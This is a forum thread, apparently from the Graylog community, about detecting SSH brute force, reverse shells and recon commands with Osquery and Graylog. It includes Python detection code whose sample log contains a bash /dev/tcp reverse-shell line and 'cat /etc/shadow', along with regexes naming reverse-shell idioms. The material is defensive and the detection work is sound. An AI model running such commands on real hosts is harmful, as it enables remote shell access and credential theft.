[Security] Monitor/Detect/Alert for anomalous behaviors on the server with Osquery + Graylog

Flow:

  1. Osquery monitors the host and pushes activity logs to the Graylog server (command logs, socket logs, file modifications, ...).
  2. Graylog uses Extractors, Rules, Pipelines, Filters & Aggregation and Alerts to detect and control security risks.

Detection Rules:

  1. SSH login && SSH brute force
  2. Running a reverse web shell
  3. Running anomalous commands: whoami, cat /etc/passwd, cat /etc/shadow, ...
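
As an added example (not code from the post or from the SIEM-CoreEngine project), the three detection rules above applied in Python to a handful of constructed osquery result lines, in the JSON-lines shape osquery's filesystem/TLS logger writes (one object per line, the row in "columns"). The query names "process_events" and "syslog", the hosts, IPs and commands are all made up for the example; the SSH brute-force rule is a sliding window of failed logins per source IP, which is the same logic one would express later as a Graylog aggregation alert:

```python
import json
import re
from collections import Counter, defaultdict

# Constructed sample of osquery differential results (JSON lines). Query names,
# hosts, IPs and commands are invented for this example.
SAMPLE_LOG = r"""
{"name":"process_events","hostIdentifier":"web01","unixTime":1700000001,"action":"added","columns":{"pid":"4021","uid":"33","path":"/usr/bin/whoami","cmdline":"whoami"}}
{"name":"process_events","hostIdentifier":"web01","unixTime":1700000002,"action":"added","columns":{"pid":"4022","uid":"33","path":"/usr/bin/cat","cmdline":"cat /etc/shadow"}}
{"name":"process_events","hostIdentifier":"web01","unixTime":1700000003,"action":"added","columns":{"pid":"4023","uid":"33","path":"/usr/bin/bash","cmdline":"bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"}}
{"name":"process_events","hostIdentifier":"web01","unixTime":1700000004,"action":"added","columns":{"pid":"4024","uid":"1000","path":"/usr/bin/ls","cmdline":"ls -la /var/www"}}
{"name":"syslog","hostIdentifier":"web01","unixTime":1700000010,"action":"added","columns":{"tag":"sshd","message":"Failed password for invalid user admin from 198.51.100.7 port 50122 ssh2"}}
{"name":"syslog","hostIdentifier":"web01","unixTime":1700000012,"action":"added","columns":{"tag":"sshd","message":"Failed password for root from 198.51.100.7 port 50123 ssh2"}}
{"name":"syslog","hostIdentifier":"web01","unixTime":1700000014,"action":"added","columns":{"tag":"sshd","message":"Failed password for root from 198.51.100.7 port 50124 ssh2"}}
{"name":"syslog","hostIdentifier":"web01","unixTime":1700000016,"action":"added","columns":{"tag":"sshd","message":"Failed password for invalid user test from 198.51.100.7 port 50125 ssh2"}}
{"name":"syslog","hostIdentifier":"web01","unixTime":1700000018,"action":"added","columns":{"tag":"sshd","message":"Failed password for root from 198.51.100.7 port 50126 ssh2"}}
{"name":"syslog","hostIdentifier":"web01","unixTime":1700000200,"action":"added","columns":{"tag":"sshd","message":"Accepted publickey for deploy from 192.0.2.10 port 51000 ssh2"}}
"""

# Rule 3: the recon commands the post lists (plus `id`), anchored at the start of cmdline.
ANOMALOUS_CMD = re.compile(r"^(?:whoami|id|cat\s+/etc/(?:passwd|shadow))(?:\s|$)")
# Rule 2: common reverse-shell idioms (bash /dev/tcp redirection, nc/ncat -e, python socket one-liners).
REVERSE_SHELL = re.compile(r"/dev/(?:tcp|udp)/|\bn?cat?\b.*\s-e\s|socket\.socket\(.*connect\(")
# Rule 1: sshd auth messages as they appear in the syslog table's "message" column.
SSH_FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
SSH_ACCEPTED = re.compile(r"Accepted (\S+) for (\S+) from (\S+) port")


def parse_osquery_lines(text):
    """Parse osquery JSON-lines output; skip blank lines and 'removed' diff rows."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("action") == "removed":
            continue
        events.append(ev)
    return sorted(events, key=lambda e: e["unixTime"])


def detect(events, window=60, threshold=5):
    """Apply the three detections; return one alert dict per hit, in event order."""
    alerts = []
    failures = defaultdict(list)  # source IP -> timestamps of recent failed logins
    for ev in events:
        host, cols, ts = ev["hostIdentifier"], ev["columns"], ev["unixTime"]
        if ev["name"] == "process_events":
            cmd = cols.get("cmdline", "")
            if ANOMALOUS_CMD.search(cmd):
                alerts.append({"rule": "anomalous_command", "host": host, "detail": cmd})
            if REVERSE_SHELL.search(cmd):
                alerts.append({"rule": "reverse_shell", "host": host, "detail": cmd})
        elif ev["name"] == "syslog" and cols.get("tag") == "sshd":
            msg = cols.get("message", "")
            m = SSH_ACCEPTED.search(msg)
            if m:
                alerts.append({"rule": "ssh_login", "host": host,
                               "detail": f"{m.group(2)} from {m.group(3)} ({m.group(1)})"})
                continue
            m = SSH_FAILED.search(msg)
            if m:
                src = m.group(2)
                # Keep only failures inside the sliding window, then add this one.
                recent = [t for t in failures[src] if ts - t <= window] + [ts]
                failures[src] = recent
                # Fire once, when the window first reaches the threshold.
                if len(recent) == threshold:
                    alerts.append({"rule": "ssh_brute_force", "host": host,
                                   "detail": f"{len(recent)} failed logins from {src} in {window}s"})
    return alerts


def alert_summary(text, **kw):
    """Rule name -> number of alerts raised for a raw osquery log."""
    return Counter(a["rule"] for a in detect(parse_osquery_lines(text), **kw))


if __name__ == "__main__":
    for a in detect(parse_osquery_lines(SAMPLE_LOG)):
        print(f"[{a['rule']}] {a['host']}: {a['detail']}")
```

On the sample this raises two anomalous_command alerts, one reverse_shell, one ssh_brute_force (the fifth failure from 198.51.100.7 inside the 60 s window) and one ssh_login. In Graylog the same thing is done by extracting `cmdline` and `message` into fields, matching them in a pipeline rule or stream rule, and turning the per-source failure count into an aggregation alert.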

hi @taibui
Maybe I didn't get it, but I cannot see a link in your post. Are you searching for stuff like this, or do you have something you want to share?


Maybe this could help?

Sorry, I do not know what the question is.


@taibui

You can use a stream to filter out those logs and then create an alert/notification.
Example stream; this has not been tested out, but I think you get the hint.

Same with the others if you want. Chances are you will need a field or stream for those unique alerts.
With Windows Event Viewer you can use the field EventID w/ 4624 for user logon sessions, etc.

Example: (image)


Hi, @taibui , To post to the new Marketplace, you’ll need to include a link to your GitHub account where users can find your add-on.


@gsmith @dscryber @ihe @StefanAustin you can see our model here: GitHub - SOC-Community/SIEM-CoreEngine: Security information and event management (SIEM) based on Graylog Open Source

We are building open source SIEM resources on the Graylog platform.
